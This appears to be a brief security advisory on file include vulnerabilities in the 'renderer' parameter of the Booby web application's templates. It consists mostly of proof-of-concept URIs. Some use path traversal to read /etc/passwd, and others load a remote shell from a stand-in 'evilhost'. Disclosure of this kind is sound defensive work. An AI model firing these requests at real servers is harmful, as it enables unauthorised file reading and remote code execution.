|
Booby 'renderer' Parameter Multiple Local and Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd http://www.example.com/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd http://www.example.com/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd http://www.example.com/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd http://www.example.com/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd http://www.example.com/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd http://www.example.com/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd http://www.example.com/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd http://www.example.com/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt http://www.example.com/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt http://www.example.com/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt http://www.example.com/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt http://www.example.com/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt http://www.example.com/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt http://www.example.com/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt http://www.example.com/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt |
|
|
Privacy Statement |
